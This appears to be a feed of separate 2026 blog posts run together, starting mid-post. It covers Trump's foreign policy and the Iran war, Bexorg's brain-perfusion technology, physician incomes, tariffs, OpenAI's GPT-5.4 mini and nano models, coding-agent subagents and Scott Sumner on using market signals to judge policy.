When Democrats or a broad civic democratic coalition retakes power their goal has to be not going back to 2015 or treating Trump as some kind of historical accident — something that still seemed plausible in 2020. It has to be to create something different, new and better.
But there’s another world-historical figure to consider besides Alexander, Caesar, Napoleon: Adolf Hitler.
Now, in saying this it may sound like I’m jumping into that cringiest version of resistance equation: Trump is the new Hitler. I’m not. Hegel, of course, didn’t know about Adolf Hitler. But he checks really all of his boxes. For the moment I want to set aside the Holocaust and most of the things we now associate with him, all the things which have made Hitler for many the literal embodiment of evil, the historical figure the moral and ideological verdicts about whom cannot be questioned. Put that all to the side. The upshot of Hitler’s reordering of the world order was to create an entirely new one. But it wasn’t the one he intended. Hitler’s dozen years on the world stage ended up creating not a global fascist order but a world in which the U.S. became the dominant but contested (by the Soviet Union) power and remade much of the world in the image of liberal democracy.
In other words, I think it’s right that Trump intuitively grasped the fragile and failing parts of the post-Cold War order that were vulnerable and exploitable. He proceeded to remake a lot of the world order with the power he gained from those intuitions and insights. But that doesn’t mean that Trumpism is the future. John gets a lot of mileage with quotes from Hakeem Jeffries and other high-profile Democrats which suggest that Trump is self-immolating and that come 2028 everything will go back to the way it used to be.
I don’t know how much those guys really believe that. If they do, they’re wrong. But I think most of us who have seriously considered the matter know that the old system is shattered. There’s no going back to the world most of us knew for most of our lives. But that doesn’t tell us a lot about the world we’re moving into.
The challenge for those of us who believe in civic democracy in the United States is that the future at home is far more mutable than that abroad. I’ve told people for a decade that my greatest fears about Trumpism were never what happens at home but what happens beyond our borders. At home we can choose to undo everything that happened in the last decade. I’m not saying that will happen. It’s quite unlikely. But we really are mostly in charge of our destiny at home. The situation beyond our borders is very different.
No matter what happens in 2028, it is impossible to imagine that the U.S. is able to put back the world order as it existed in 2016. No allies can possibly trust the US to play the role it played since the early 1990s and in a broader way since the late 1940s. The U.S. had the wealth and power to create a new world order in the late 1940s. It doesn’t remotely have that today. Maintaining something is a far lighter lift than creating something new. That means that a vast amount of the advantage, power and insulation from the vicissitudes of history we had is gone. That sucks.
It would be foolish to deny the transformative impact Trump has had on the history of our time. It’s vast. We just don’t know yet where that transformation is leading.

I’ll be talking with TPM reporter Khaya Himmelman about her coverage of Trump’s attacks on election administration so far this year, as his Justice Department attempts to bully states into handing over sensitive voter data and as he tries to force the Senate to pass a sweeping voter suppression bill. Join us on Substack Live at 12:00 p.m. ET today. See you there!
The courier arrived with the human brain early in the morning.
The brain, insulated in a cooler, came in through the back door of a start-up called Bexorg located in New Haven, Connecticut. It then went into the hands of Josip Butkovic, a Croatian-born surgeon, who carried the package to a prep table in Bexorg’s basement. Next, Butkovic removed the brain and placed it in a metal bowl. Gelatinous and shiny, the brain spread out to push against the bowl’s edges.
Butkovic, dressed in scrubs, spent a half-hour inspecting the brain and repairing some of its vasculature. He also began inserting tubes and valves into the organ. Shortly thereafter, he placed the brain onto a cart and transported it upstairs into a room that looked part laboratory and part hospital. It had computers and various types of testing equipment throughout and then several large, rectangular pods that were enclosed in plexiglass and plastic to protect them from things floating in the air and that were filled with medical equipment. Butkovic brought the brain into one of these pods and started to attach it to a machine of Bexorg’s invention – a hardware system that could advance brain science and drug development in astonishing ways.
The machine is what’s known as a perfusion device, meaning that it perfuses or passes fluids and gases through an organ to keep it functional. Doctors use something similar – a heart-lung bypass machine - during open heart surgery to replicate the work of the heart and the lungs and circulate oxygenated blood through the body. No one, though, has created an equivalent machine for the brain - except for Bexorg. The start-up’s scientists, after many years of research, have developed a way to keep a human brain going outside of the body for up to a day.
This is the part of the story where some of you will be wondering if/fearing that the brains have been reanimated and are perhaps once again alive in a thinking or feeling sense. To which, Bexorg’s co-founders - Zvonimir Vrselja and Nenad Sestan - would say, “No.” The brains come from donors and, by the time they arrive at Bexorg, they’ve been dead for several hours. They have no electrical activity. The neurons inside are not firing. What Bexorg is doing is reviving the brains on a molecular level and restoring their base, biological function like metabolizing oxygen and glucose.
The brains Bexorg receives often come from people who were afflicted with conditions like dementia and Parkinson’s and Alzheimer’s disease. Bexorg connects these brains to its perfusion system so that it can test new therapies on the organs and then measure the results. And this is a very big deal because we currently lack a good way to test drugs on the brains of humans. People, after all, don’t like their brains to be experimented on while they’re alive nor is there a convenient means of sampling from a living brain to see what’s happening inside of it.
For these reasons, most new brain therapies are tested first on rodents and then sometimes primates but with abysmal results. By the time a drug gets near a clinical trial in humans, a pharma company might have spent a decade and a $1 billion or more. And, at that point, its drug will likely still fail. Drugs aimed at central nervous system conditions have a failure rate that hovers around 95 percent, while therapies meant to slow or reverse Parkinson’s and Alzheimer’s fail about 99 percent of the time.
Bexorg’s hope, then, is to give researchers a way to test their drugs much earlier on real human brains and to see what works and what doesn’t before tons of money has been spent. “We are not doing this as a research project,” says Vrselja, Bexorg’s CEO. “I want to see therapies for Alzheimer’s and for Parkinson’s. There are people waiting for those drugs, and we want to push as quickly as possible to get those drugs and those cures to them.”
We compare physician incomes using tax data from the United States, Canada, Sweden, and the Netherlands. Physicians are concentrated in the top percentiles of the income distribution in all four countries, especially in the United States and certain specialties. Physician incomes are highest in the United States, and a decomposition shows that this mainly reflects differences in overall income distributions, rather than physicians’ locations in those distributions. This suggests that broader labor market differences, and thus physicians’ outside options, drive absolute incomes. Shifting US physicians’ incomes to match relative positions in other countries’ distributions would only marginally reduce healthcare spending.
By Aidan Buehler, et.al., from a new NBER working paper.
The post International Comparison of Physician Incomes appeared first on Marginal REVOLUTION.
Yesterday, President Donald J. Trump continued to demand that other countries help the U.S. reopen the Strait of Hormuz for tanker traffic, but one by one, they declined. It is a dangerous business, and since Trump launched the war without consulting anyone, they don’t seem inclined to help him out of the mess he created. For his part, Trump has told reporters that “numerous countries” have told him “they’re on their way” to help enable ships to transit the strait, but he has also threatened to leave the North Atlantic Treaty Organization (NATO) over allies’ unwillingness to help clear the strait.
Trump has never articulated a clear reason for the war, but Israeli prime minister Benjamin Netanyahu and Israeli officials have opened another front in Lebanon, saying they intend to destroy the terror infrastructure there as they did in Gaza. So far, Israel’s recent operations in Lebanon have killed more than 850 people and displaced at least 800,000.
Thomas Grove, Milàn Czerny, and Benoit Faucon of the Wall Street Journal reported today that Russia has expanded its efforts to keep Iran in the fight against the U.S. and Israel, offering more intelligence sharing and military cooperation. Russia is providing drone components and satellite imagery that enables Iran to strike U.S. troops and radar systems. The reporters say that “Russia is trying to keep its closest Middle Eastern partner in the fight against U.S. and Israeli military might and prolong a war that is benefiting Russia militarily and economically.”
Meanwhile, Iran has been moving its own ships through the strait and appears to be willing to allow passage through for countries that are willing to negotiate with it. If that practice becomes widespread, prices on oil will ease, making it harder for Iran to keep up pressure on the U.S. and Israel.
Oil is now selling at more than $100 a barrel, up from about $70 a barrel before the U.S. and Israeli strikes on Iran that began on February 28, and gas prices have risen by at least $0.70 a gallon since then. As David Goldman of CNN reports, Iran’s ability to stop most traffic through the Strait of Hormuz threatens not just about 20% of the world’s oil supply as well as natural gas. About 20% of the world’s fertilizer also passes through the strait, which will affect crops for this year’s growing season. It will also limit helium—necessary for the cooling process when making silicon chips and cooling medical equipment—and aluminum.
Anna Kramer of NOTUS reported today that last fall the Trump administration cut all the State Department staffers from the Bureau of Energy Resources who were in charge of maintaining diplomatic contacts with foreign energy bureaus and Middle East gas and oil companies. Those laid off included the only expert in tracking sanctioned oil tankers, and the person in charge of coordinating with the international agency that manages releases of oil reserves around the world to address crises.
“There was never any handover or transition. There was no formal handover of contacts or anything like that. We were all just let go,” one former State Department energy official told Kramer. Those trying to work on energy issues with the U.S. government after their departure could not find any contacts.
Nine former members of the bureau told Kramer it seems clear the administration did not prepare for a global oil crisis. Trump’s claim that “nobody expected” Iran to hit other countries in the Middle East supports their statement because, as they told Kramer, previous administrations planned for exactly that scenario.
Judd Legum of Popular Information explained today that the administration decommissioned the last of its four minesweeper ships in September. Based in Bahrain, the vessels were equipped to find and destroy both moored and bottom mines. They were supposed to be replaced with new systems that use unmanned vehicles, but those have so far been unreliable, and the systems apparently have not been deployed. Legum points out that starting a military operation without anti-mining ships in the region to protect traffic through the Strait of Hormuz illustrates how poorly officials planned.
According to Aaron Rupar of Public Notice, Representative Eric Swalwell (D-CA) observed that Trump “has more plans for the ballroom he’s trying to build at the East Wing than anything he’s gonna do next in the Middle East.”
The fact that Trump’s allies in the White House are backing away from the war, talking to journalists like Politico’s Megan Messerly for a piece published today, suggests they see this conflict as a political disaster. Sources told Messerly they hoped the strikes would be quick, removing Iran’s leader much as Trump’s Venezuela strikes did in January. They said they thought Trump’s vagueness on objectives would let him declare victory whenever he wanted to.
Now, though, the sources told Messerly, they think Trump “no longer controls how, or when, the war ends.” One told her: “We clearly just kicked [Iran’s] ass in the field, but, to a large extent, they hold the cards now. They decide how long we’re involved—and they decide if we put boots on the ground. And it doesn’t seem to me that there’s a way around that, if we want to save face.” Another warned that officials in the White House “need to worry about an unraveling.”
The sense that Trump has dragged the U.S. into a war in the Middle East is splitting MAGA leadership. Isolationists who supported Trump’s claims of being “America First” and ending long foreign wars are turning on those supporting Trump’s Iranian incursion, and their attacks on social media have become deeply personal. They seem to be trying to hive their supporters off from Trump to coalesce around an even more extreme white nationalism that highlights antisemitism.
Today Joe Kent, a staunch Trump ally, resigned as director of the National Counterterrorism Center, saying that he supported “the values and the foreign policies” Trump had campaigned on but that he “cannot in good conscience support the ongoing war in Iran. Iran posed no imminent threat to our nation, and it is clear that we started this war due to pressure from Israel and its powerful American lobby.”
Although Kent is correct that U.S. intelligence assessed that Iran posed no imminent threat to the U.S., both the White House and House speaker Mike Johnson (R-LA) pushed back aggressively on Kent’s statements, trying to justify their Iran entanglement.
Johnson said, “We all understood that there was clearly an imminent threat that Iran was very close to the enrichment of nuclear capability and they were building missiles at a pace no one in the region could keep up with.” Trump seemed to try to blame former president Barack Obama for the crisis, telling reporters today that “if I didn’t terminate Obama’s horrible deal that he made…, you would have had a nuclear war four years ago. You would have had…nuclear holocaust, and you would have had it again if we didn’t bomb the site.”
Trump told reporters he thought Kent was a “nice guy” but “very weak on security,” and that he didn’t know Kent well.
Yesterday Trump told reporters that a former president told him, “I wish I did what you did” in attacking Iran. He added, “I don’t want to get into ‘who,’ I don’t want to get him into trouble,” although he said it wasn’t former president George W. Bush and also implied it was a Democrat. Chris Cameron of the New York Times reported that those close to all former Democratic presidents—Bill Clinton, Barack Obama, and Joseph R. Biden—deny that they said any such thing or that they have had any contact with Trump lately.
This morning, Trump posted on social media: “Because of the fact that we have had such Military Success, we no longer ‘need,’ or desire, the NATO Countries’ assistance—WE NEVER DID! Likewise, Japan, Australia, or South Korea. In fact, speaking as President of the United States of America, by far the Most Powerful Country Anywhere in the World, WE DO NOT NEED THE HELP OF ANYONE!”
Meanwhile, Trump appears to be attempting to remove the leadership of Cuba. Frances Robles, Edward Wong, and Annie Correal of the New York Times reported yesterday that U.S. officials want to force Cuban president Miguel Díaz-Canel from power but will leave the next steps up to the Cuban people. The reporters note such a move might enable Trump to declare a victory. The U.S. has cut off the oil that feeds Cuba’s energy grid, forcing it to collapse.
Yesterday, Trump told reporters: “I do believe I’ll be the honor of, having the honor of taking Cuba. That’d be good,” he said. “That’s a big honor. Taking Cuba, in some form, yeah, taking Cuba. I mean, whether I free it, take it. I think I could do anything I want with it, if you want to know the truth. They’re a very, uh, weakened nation right now.”
Trump’s team has blamed the media for what he insists are unfair reports about the Iran conflict. He has also gone after the Supreme Court, complaining on Sunday about its ruling that his tariffs were unconstitutional, but also complaining that the justices permitted Biden to be inaugurated, continuing to insist—in the face of all evidence to the contrary—that the 2020 presidential election was stolen. He insisted that “[t]his completely inept and embarrassing Court” is “hurting our Country, and will continue to do so. All I can do, as President, is call them out for their bad behavior!” Trump called the court “little more than a weaponized and unjust Political Organization.”
Trump’s pressure on the court over his claims of political weaponization and the 2020 presidential election seems designed to enlist their support for his claims that the 2026 election was rigged if voters choose Democratic majorities in the House and/or the Senate. Trump told House members in January that if the Republicans don’t retain control of the House, he will be impeached.
Trump and his loyalists insist that Congress must pass the Safeguard American Voter Eligibility (SAVE) America Act to prevent Democrats from stealing the 2026 election, with Trump posting on social media today: “The Save America Act is one of the most IMPORTANT & CONSEQUENTIAL pieces of legislation in the history of Congress, and America itself. NO MORE RIGGED ELECTIONS! Voter I.D., Proof of Citizenship, No Rigged Mail-In Voting….”
The Republicans won the House, the Senate, and the presidency in 2024, making it hard to argue that Republicans cannot win without new voting rules, but as G. Elliot Morris of Strength in Numbers noted today, since then Trump has lost the working-class white voters and Latino voters who put him in office. Republicans could woo them back but instead are trying to push voters off the rolls by demanding proof of citizenship to vote.
It is already illegal for noncitizens to vote in federal elections—such voting is vanishingly rare— and states, which run elections, already require ID. According to the Brennan Center for Justice and the University of Maryland’s Center for Democracy and Civic Engagement, Trump’s demand that voters provide proof of citizenship—a passport or a birth certificate and matching REAL ID—when registering to vote and again at the polls would cut as many as 21 million voters off the rolls.
To push the measure through the Senate, Republicans will have to kill the filibuster that requires 60 votes to move a bill forward from debate. Trump is demanding Senate majority leader John Thune (R-SD) make that change to Senate rules, but Thune and less-MAGA Republicans don’t want to. Republicans say they want to debate the measure so that Democrats will be forced to defend their objection to it, but already the fight seems to be shaping up as between Republicans eager to pass a voter suppression bill to support Trump, and those willing to protect voters as well as their own voices in the Senate.
Tonight the Senate voted to take up the measure.
—
Notes:
https://www.notus.org/trump-white-house/trump-doge-cuts-middle-eastern-oil-gas-crises
https://tradingeconomics.com/commodity/brent-crude-oil
https://www.cnn.com/2026/03/17/business/price-increases-oil-food-aluminum-iran-war
https://apnews.com/live/iran-war-israel-trump-03-17-2026
https://apnews.com/live/iran-war-israel-trump-03-17-2026#0000019c-fc5c-dac0-ab9f-fe5e7bec0000
https://apnews.com/live/iran-war-israel-trump-03-17-2026#0000019c-fc7d-dd1d-adbd-fdff33ac0000
https://apnews.com/live/iran-war-israel-trump-03-17-2026#0000019c-fc93-d28e-a79d-fcf32ff50000
https://apnews.com/live/iran-war-israel-trump-03-17-2026#0000019c-fc91-d54a-afff-fcbbf52c0000
https://www.axios.com/2026/03/17/joe-kent-resigns-trump-iran-israel-threat
https://www.nytimes.com/2026/03/16/us/politics/trump-iran-presidents-democrats.html
https://www.nytimes.com/2026/03/16/world/americas/trump-cuba-president-diaz-canel.html
https://www.nytimes.com/2026/03/16/world/europe/europe-iran-war-trump-hormuz-warships.html
https://www.scientificamerican.com/article/iran-was-nowhere-close-to-a-nuclear-bomb-experts-say/
https://www.brennancenter.org/our-work/analysis-opinion/why-myth-noncitizen-voting-persists
https://www.cnbc.com/2026/03/17/save-america-act-voter-id-trump-senate.html
Bluesky:
thesteadystate.org/post/3mhbhehhrnz2g
atrupar.com/post/3mhbbnstzz226
ronfilipkowski.bsky.social/post/3mhbf2hwxys2b
atrupar.com/post/3mhb4jdhi5q2z
atrupar.com/post/3mh7d5qmfou23
atrupar.com/post/3mh7flrcoxx2y
atrupar.com/post/3mh5hcpgjfk2o
Donald Trump is now pleading with other countries to rescue his war on Iran by helping to open the Strait of Hormuz — although Trump being Trump, his pleas for assistance take the form of threats. Regardless, help is not on the way. Germany, Australia and Japan have flatly said no, while Britain and France have been slightly equivocal but at most hinted at willingness to supply forces after the fighting stops.
Why this effectively unanmous rejection? A large part of the answer is that other countries couldn’t secure the Strait even if they wanted to. Boris Pistorius, Germany’s Defense Minister, was outright caustic in remarks Monday:
What does (...) Donald Trump expect a handful or two handfuls of European frigates to do in the Strait of Hormuz that the powerful U.S. Navy cannot do?
Beyond that, who wants to take risks in support of a U.S. government that nobody trusts, a government that neither shows gratitude for aid nor punishes those who do America harm?
Indeed, even as Trump begs in his graceless way for help, his administration is preparing to hit the very nations he is appealing to with another round of tariffs — tariffs that will be imposed based on an obviously false, bad faith, totally insulting argument.
As most readers probably know, almost a year ago Trump imposed tariffs on almost every other nation, including islands inhabited only by penguins, by invoking the International Emergency Economic Powers Act. This use of IEEPA was blatantly illegal, and after dragging its heels for many months, the Supreme Court finally agreed with lower courts that the tariffs were, in fact, illegal.
One important point that isn’t emphasized enough is that in addition to being illegal under U.S. law, the IEEPA tariffs were a gross breach of contract. Most U.S. tariff rates were set in 1995, as part of the negotiations that among other things created the World Trade Organization. These tariffs were “bound” by international agreements, which have almost as much force as treaties. But the U.S. just ripped those agreements up, without even trying to make a case for its actions.
Now the IEEPA tariffs are gone, but Trump isn’t giving up. On Sunday night he posted a long, falsehood-filled rant about the Court, beginning with a condemnation of its tariff ruling. And while he can’t simply defy Supreme Court rulings — not yet, anyway — his officials have been scrambling for legal strategies to reimpose high tariffs.
And the main one they’ve come up with is a doozy. Under U.S. law the executive branch has the authority to impose tariffs without new legislation in certain specified circumstances. These include Section 232 tariffs to protect national security, the (spurious) basis for most of the tariffs that survived the Supreme Court’s ruling. (I’m ignoring the Section 122 tariffs currently in place to deal with a nonexistent balance of payments crisis, not because they’re legal — they clearly aren’t — but because they will expire this summer.)
Looking forward, however, Trump officials are planning to impose another major round of tariffs using Section 301, designed to cope with unfair foreign trading practices. In particular, they’re proposing tariffs on 60 (!) countries, including Canada, the UK and the European Union, that they accuse of violating rules against international trade in goods produced with forced labor.
Wait — is the administration accusing Canada and Europe of using slave labor to produce their exports? No, they’re saying that these countries’ governments are guilty of “failure to impose and effectively enforce a ban on the importation of goods produced with forced labor,” and that these failures “burden or restrict U.S. commerce.” In other words, they’re going to slap tariffs on Canada, not because they claim that Canada uses slave labor, but because China does, and they claim that Canada is hurting America because it isn’t doing enough to stop those slave-produced goods from entering its own market.
Nobody, and I mean nobody, believes this story. Nobody believes that Canada or Europe are worse at policing global slave labor than the U.S. is. In fact, nobody believes that the Trump administration even cares about slave labor. After all, the alleged concerns that are about to be used to raise tariffs were nowhere to be found until the Court ruled against IEEPA.
So this is nothing but an excuse for another attempted end-run around the law — an end-run that is also a massive insult to other democratic nations, the same nations Trump is pleading with for help in undoing the disaster he has created in the Persian Gulf.
The point is that it’s all of a piece. The current U.S. government has, as Trump would say, treated our erstwhile allies very, very badly in multiple ways, with the arbitrary, illegal imposition of tariffs the most consequential. And now those erstwhile allies have no inclination to help Trump out of the Iran trap he created for himself. Funny how that works.
MUSICAL CODA
Great news—we’ve hit our (very modest) performance goals for the CPython JIT over a year early for macOS AArch64, and a few months early for x86_64 Linux. The 3.15 alpha JIT is about 11-12% faster on macOS AArch64 than the tail calling interpreter, and 5-6%faster than the standard interpreter on x86_64 Linux.
— Ken Jin, Python 3.15’s JIT is now back on track
Tags: python
OpenAI today: Introducing GPT‑5.4 mini and nano. These models join GPT-5.4 which was released two weeks ago.
OpenAI's self-reported benchmarks show the new 5.4-nano out-performing their previous GPT-5 mini model when run at maximum reasoning effort. The new mini is also 2x faster than the previous mini.
Here's how the pricing looks - all prices are per million tokens. gpt-5.4-nano is notably even cheaper than Google's Gemini 3.1 Flash-Lite:
| Model | Input | Cached input | Output |
|---|---|---|---|
| gpt-5.4 | $2.50 | $0.25 | $15.00 |
| gpt-5.4-mini | $0.75 | $0.075 | $4.50 |
| gpt-5.4-nano | $0.20 | $0.02 | $1.25 |
| Claude Opus 4.6 | $5.00 | - | $25.00 |
| Claude Sonnet 4.6 | $3.00 | - | $15.00 |
| Gemini 3.1 Pro | $2.00 | - | $12.00 |
| Claude Haiku 4.5 | $1.00 | - | $5.00 |
| Gemini 3.1 Flash-Lite | $0.25 | - | $1.50 |
I used GPT-5.4 nano to generate a description of this photo I took at the John M. Mossman Lock Collection:

llm -m gpt-5.4-nano -a IMG_2324.jpeg 'describe image'
Here's the output:
The image shows the interior of a museum gallery with a long display wall. White-painted brick walls are covered with many framed portraits arranged in neat rows. Below the portraits, there are multiple glass display cases with dark wooden frames and glass tops/fronts, containing various old historical objects and equipment. The room has a polished wooden floor, hanging ceiling light fixtures/cords, and a few visible pipes near the top of the wall. In the foreground, glass cases run along the length of the room, reflecting items from other sections of the gallery.
That took 2,751 input tokens and 112 output tokens, at a cost of 0.069 cents (less than a tenth of a cent). That means describing every single photo in my 76,000 photo collection would cost around $52.44.
I released llm 0.29 with support for the new models.
Then I had OpenAI Codex loop through all five reasoning effort levels and all three models and produce this combined SVG grid of pelicans riding bicycles (generation transcripts here). I do like the gpt-5.4 xhigh one the best, it has a good bicycle (with nice spokes) and the pelican has a fish in its beak!
Tags: ai, openai, generative-ai, llms, llm, vision-llms, llm-pricing, pelican-riding-a-bicycle, llm-release
If you do not understand the ticket, if you do not understand the solution, or if you do not understand the feedback on your PR, then your use of LLM is hurting Django as a whole. [...]
For a reviewer, it’s demoralizing to communicate with a facade of a human.
This is because contributing to open source, especially Django, is a communal endeavor. Removing your humanity from that experience makes that endeavor more difficult. If you use an LLM to contribute to Django, it needs to be as a complementary tool, not as your vehicle.
— Tim Schilling, Give Django your time and money, not your tokens
Tags: ai-ethics, open-source, generative-ai, ai, django, llms
Agentic Engineering Patterns >
LLMs are restricted by their context limit - how many tokens they can fit in their working memory at any given time. These values have not increased much over the past two years even as the LLMs themselves have seen dramatic improvements in their abilities - they generally top out at around 1,000,000, and benchmarks frequently report better quality results below 200,000.
Carefully managing the context such that it fits within those limits is critical to getting great results out of a model.
Subagents provide a simple but effective way to handle larger tasks without burning through too much of the coding agent’s valuable top-level context.
When a coding agent uses a subagent it effectively dispatches a fresh copy of itself to achieve a specified goal, with a new context window that starts with a fresh prompt.
Claude Code uses subagents extensively as part of its standard way of working. Let's use that as an illustrative example.
Any time you start a new task against an existing repo Claude Code first needs to explore that repo to figure out its general shape and find relevant information needed to achieve that task.
It does this by constructing a prompt and dispatching a subagent to perform that exploration and return a description of what it finds.
I kicked off a Claude Code session with a screenshot of a page from my guide and this prompt:
Make the chapter diffs also show which characters have changed in this diff view with a darker color of red or green for the individually changed segments of text within the line
Here's the transcript of that session.
Claude Code started by running an “Explore” subagent with the following starter prompt:
Find the code that implements the diff view for "chapters" in this Django blog. I need to find:
- Templates that render diffs (look for diff-related HTML/CSS with red/green backgrounds)
- Python code that generates diffs (look for difflib usage or similar)
- Any JavaScript related to diff rendering
- CSS styles for the diff view (red/green line backgrounds)
Search thoroughly - check templates/, static/, blog/ directories. Look for keywords like "diff", "chapter", "revision", "history", "compare".
Subagents work similar to any other tool call: the parent agent dispatches them just as they would any other tool and waits for the response. It's interesting to see models prompt themselves in this way - they generally have good taste in prompting strategies.
The Explore subagent churned away for a few seconds and returned a response that started like this:
Perfect! Now let me create a comprehensive summary with all the findings:
Summary: Chapter Diff View Implementation
I found the complete implementation of the diff view for chapters in this Django blog. Here are the key components:
1. Python Code - Diff Generation (
/home/user/simonwillisonblog/guides/views.py, lines 139-202)The
chapter_changes()view function uses Python's built-indifflib.unified_diff()to generate diffs: […]
The full subagent response included all of the details the parent agent needed in order to start editing the code to address my original request.
This Explore subagent is the simplest example of how subagents can work, with the parent agent pausing while the subagent runs. The principle advantage of this kind of subagent is that it can work with a fresh context in a way that avoids spending tokens from the parent’s available limit.
Subagents can also provide a significant performance boost by having the parent agent run multiple subagents at the same time, potentially also using faster and cheaper models such as Claude Haiku to accelerate those tasks.
Coding agents that support subagents can use them based on your instructions. Try prompts like this:
Use subagents to find and update all of the templates that are affected by this change.
Some coding agents allow subagents to run with further customizations, often in the form of a custom system prompt or custom tools or both, which allow those subagents to take on a different role.
These roles can cover a variety of useful specialties:
While it can be tempting to go overboard breaking up tasks across dozens of different specialist subagents, it's important to remember that the main value of subagents is in preserving that valuable root context and managing token-heavy operations. Your root coding agent is perfectly capable of debugging or reviewing its own output provided it has the tokens to spare.
Several popular coding agents support subagents, each with their own documentation on how to use them:
Tags: parallel-agents, coding-agents, generative-ai, agentic-engineering, ai, llms
Richard Hanania has an interesting post explaining why it is often a mistake to take a wait and see approach to judging public policies:
In the weeks after Maduro was seized, the value of the Venezuelan stock market skyrocketed 260%. Some argue that liquidity was low, but tens of billions of dollars isn’t exactly nothing, and I put a lot of weight on this piece of data. In The Midas Paradox, Scott Sumner judges the wisdom of US policy up to and throughout the Great Depression based on the immediate movements of the stock market, and other indicators like bond and foreign exchange markets. If FDR announced a change in policy and the stock market went down, for example, he doesn’t care if it ended up rising six months down the line. The theory behind this idea is that people with skin in the game take into account all foreseeable circumstances at the time an event occurs, and what happens later can always be better explained by more proximate causes. I prefer this approach because otherwise you can just come up with any story you want about the wisdom of various economic policies.
I’m not really a fan of the Maduro raid, for “rules utilitarian” reasons that I discuss in a post that I wrote a few weeks ago but haven’t gotten around to publishing yet. But I do believe that Hanania is correct that the raid is a net positive for Venezuela and indeed may well end up being a positive for the US as well. (Hanania also discusses the negative market response to the Iran War.) Because Hanania cites my previous work in this area, I thought I should do a post explaining my views.
I’ve often argued that there is no point in waiting to see what happens after policies are adopted that have the goal of influencing aggregate demand. Thus, when the Fed makes a major policy announcement, we know within minutes everything we will ever know about the impact of that action. Because this claim is so unconventional—and would likely be rejected by most economists—I’d like to defend the idea using an analogy from the world of sports.
Assume that the Las Vegas betting line has the Kansas City Chiefs a 10-point favorite over the Tennessee Titans. Two days before the game, Patrick Mahomes is injured in practice, and the betting line drops to KC by two points. In the actual game, the Chiefs end up winning by 11. How should we think about the impact of the injury to Mahomes.
Those who favor a “wait and see” approach, might argue that the injury had no impact, as the Chiefs actually won by more than the pre-injury line. I would argue that the injury reduced the Chiefs expected net performance by 8 points, as prediction markets are the best way of ascertaining the truth about reality. The actual outcome of any game is highly unpredictable, as it is influenced by a wide range of factors that are difficult to forecast. Even the shape of the American football adds randomness to the game, as it often bounces unpredictably during punts.
Most economists are fairly rational thinkers, and I suspect that most of them would agree with my claim about point spreads in a Chiefs game. The betting line provides more accurate information about the impact of an injury than the actual outcome of the game.
But I also suspect that most economists disagree with my rejection of the wait and see approach to economic policy initiatives, and especially my claim that within minutes of a policy announcement we know everything we will ever know about the impact of the policy. Indeed, even I regard this claim as a slight overstatement, as Fed announcements include more than a rate change, and there is often further market reaction during the afternoon of a Fed announcement, as markets digest both the forward guidance in the full statement and also the interpretation provided by pundits. Even so, the market reaction is mostly complete by the end of the trading day.
In January 2001 and again in September 2007, markets responded very positively to more expansionary than expected Fed announcements, and in December 2007 the response was very negative to a more contractionary than expected announcement. You could argue that only the latter reaction was ”correct”, as in all three cases we eventually went into recession. But I don’t see it that way. Rather, in all three cases the markets were worried about recession, and in all three cases they were “rooting” for actions that made recession less likely.
As Hanania indicated, in The Midas Paradox I spent a lot of time looking at stock market reactions to policy shocks. To be clear, I do not believe that the stock market is a reliable indicator in all circumstances. To take an obvious example, I would not use the stock market reaction to a cut in corporate tax rates as a indicator of whether lower corporate taxes were good public policy. So why did I frequently use them when evaluating policy during the Great Depression?
A graph in The Midas Paradox shows an unusually strong correlation between (logs of) stock prices and industrial production from January 1929 through December 1938:
(Notice the lack of “long and variable lags”.)
The term ‘ad hoc’ is often seen as a pejorative, but when special circumstances allow a technique to be unusually effective, then it makes sense to use that technique. It just so happens that output was undesirably low throughout the entire 1930s. It is also the case (probably for related reasons) that stock prices and industrial production were unusually closely correlated during this period. In that economic environment, policies that tended to raise output also tended to raise stock prices, and vice versa. The same might not be true in an overheated economy such as 2022-23. And even in the 1930s, I did not rely solely on stock prices. I also looked at the reaction of numerous other financial market indicators, including bond yields, yield spreads, exchange rates, and commodity price indices.
I got into blogging out of frustration that the Fed seemed to ignore market signals in late 2008. For instance, it refused to cut rates in the meeting after Lehman failed, despite plunging TIPS spreads. Readers often tell me that they like my blog because my takes have been more accurate than those of many other pundits. While some warned that Bernanke’s QE would create high inflation, I predicted that inflation would remain below target. While Keynesians predicted that fiscal austerity would sharply slow the economy in 2013, the economy actually accelerated.
Alex Tabarrok also thought the 2013 “market monetarist experiment” was a bad look for Keynesians, although he rightly noted that a single experiment is not decisive. My relative complacency about the fiscal austerity was mostly based on the relative stability of various asset prices, including stocks and TIPS spreads. I didn’t have a high level of confidence that we market monetarists would “win” this contest, but then it was the market forecasts that mattered to me, not the subsequent real-world outcome. Unfortunately, the world I live in doesn’t agree with me, and I’m forced to play by their rules—the “wait and see” approach. Luckily, in 2013 I came out ahead. But even if I had been wrong, I would not have regretted relying on market signals.
I'm certainly no Nostradamus. When the markets are wrong (and they are frequently wrong), then I’m also wrong. Unlike in 2013, I would have lost a bet made in 2021 on whether the fiscal and monetary stimulus would lead to high inflation. If you bet on a series of football games with the point spread in your favor, you will usually win. But losses will by no means be infrequent. The rationalist community argues that the best we can hope for is to be “less wrong”, and I believe that market forecasts are the best way of doing that.
I was a relatively unknown economist in 2008, teaching at a second-tier college. Whatever reputation I have comes from my use of market signals in blog posts. Because I’m not good with technology, I didn’t get my blog up and running until early 2009. If I’d started blogging in mid-2008, my reputation might be somewhat higher. But I have no reason to complain. If I’d started blogging in 2005 my reputation would be far lower, as I deny the existence of bubbles, including housing bubbles. I still don’t believe that 2006 was a bubble (real housing prices have since recovered), but most people don’t see things that way.
While I approve of Hanania’s general approach to evaluating the success of policy initiatives, let me end with a note of caution. Markets are not very good at evaluating existential risks. Consider a hypothetical foreign policy initiative that increases the risk of a major nuclear war by 1%. Perhaps a US decision to go to war with Russia over Ukraine, or China over Taiwan. Also assume that a nuclear exchange would kill 200 million people. How would markets react to that risky policy initiative?
Even if nuclear war drove US equity prices down close to zero, the stock market might only decline by 1% on the news of US intervention, as the risk of nuclear war has increased, by assumption, by only 1 percent. But even a 1% risk of nuclear war has an expected value of 2 million deaths and thus is very likely a bad policy choice.
I’m not certain if the Munich agreement of 1938 slightly increased the chance of a war that ended up killing 50 million people, but this New York Times report has always haunted me:
